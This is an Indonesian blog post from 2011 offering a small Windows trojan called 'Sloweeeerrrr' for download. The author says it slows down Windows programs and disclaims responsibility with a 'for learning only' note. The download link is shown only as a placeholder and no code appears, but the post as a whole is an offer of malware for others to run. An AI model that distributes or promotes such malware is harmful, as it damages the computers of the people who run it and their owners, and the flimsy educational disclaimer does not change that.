Pages

Sabtu, 21 Mei 2011

Slowerrr | Virus PC

Virus yang akan saya share kali ini adalah virus sloweeeerrrr.... sebenarnya saya udah lama peliahara nih virus,,,, kasihan kalo di update ke Blog.... ntar ga ada yang kasi makan (wkwkwk kayak kucing aja)... Baiklah langsung aja ga usah basa basi lagi.....


Jika ditanyakan apa efek dari virus ini, maka saya akan jawab "biasanya efek virus komputer gimana??"
namun virus yang disini di golongkan ke trojan, menurut saya karena tidak menginfeksi file lainnya. Tapi hanya sekedar menyerang dan memperlambat beberapa program windows anda :D

NB: Segala kerusakan yang terjadi, bukan tanggung jawab saya. Program ini hanya untuk pembelajaran saja :)

Link download:
<download Sloweeerrr> 5Kb

0 komentar:

Posting Komentar

 
:a: :b: :c: :d: :e: :f: :g: :h: :i: :j: :k:
offsetWidth); }